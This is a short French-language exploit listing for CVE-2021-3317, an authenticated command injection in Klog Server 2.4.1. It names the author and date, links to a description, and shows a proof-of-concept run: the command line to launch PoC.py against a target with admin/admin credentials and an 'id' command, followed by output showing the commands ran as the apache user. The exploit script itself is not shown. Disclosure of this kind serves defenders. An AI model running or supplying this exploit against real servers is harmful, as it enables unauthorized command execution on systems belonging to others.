
CVE-2021-3317
Titre de l'exploit : Klog Server 2.4.1 - Injection de commande (authentifié)
Date : 26.01.2021
Auteur de l'exploit : Metin Yunus Kandemir
Page d'accueil du fournisseur : https://www.klogserver.com/
Version : 2.4.1
Description : https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection
CVE : 2021-3317
python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id
[*] Code d'état pour la requête de connexion : 302
[+] Authentification réussie !
[*] Exploitation en cours...
uid=48(apache) gid=48(apache) groups=48(apache)
https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection